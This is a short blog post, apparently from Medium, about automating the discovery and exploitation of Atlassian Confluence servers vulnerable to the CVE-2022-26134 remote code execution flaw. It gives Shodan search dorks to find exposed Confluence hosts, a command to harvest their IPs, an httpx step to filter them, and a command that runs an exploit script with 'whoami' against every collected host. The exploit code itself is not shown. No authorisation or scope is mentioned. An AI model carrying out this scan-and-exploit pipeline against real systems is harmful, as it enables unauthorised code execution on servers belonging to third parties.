How I was able to find 150+ vulnerable applications to CVE-2022–26134 | A Zero-day RCE
Hey everyone, I'm abhishekmorla.
Let's not dive into the heart of this CVE you can prefer this medium blog for a detailed analysis of this zero-day: “CVE-2022–26134”
The main concern about this blog is to share with you how can you automate and save time.
Here is the link: “CVE-2022–26134 with shodan”
The first part of the repository will collect all the IPs depending on which dork you have provided in the -d argument. you can use these shodan dorks to find Atlassian confluence applications :
http.component:”atlassian confluence”
http.favicon.hash:-305179312"
http.title:”Log In — Confluence” 200
http.component:”atlassian confluence” http.title:”Log In — Confluence” 200
http.favicon.hash:-305179312 200
So, run the shodan scripts to grab all the IPs
python3 shodan_script.py -API xxxxxxx -L 10 -D “http.favicon.hash:-305179312 200” > log.txt
Now we will use httpx to get all the valid IPs
cat log.txt | httpx -o forexploits.txt
Finally, run the exploit script against all the valid collected IPs
python3 CVE-2022–26134.py forexploits.txt “whoami”
It will print the IP and command for vulnerable hosts.
Video — https://youtu.be/mNBCMUNUn_U
Thanks for reading!
LinkedIn : https://www.linkedin.com/in/abhishekmorla/
twitter : https://twitter.com/abhishekmorla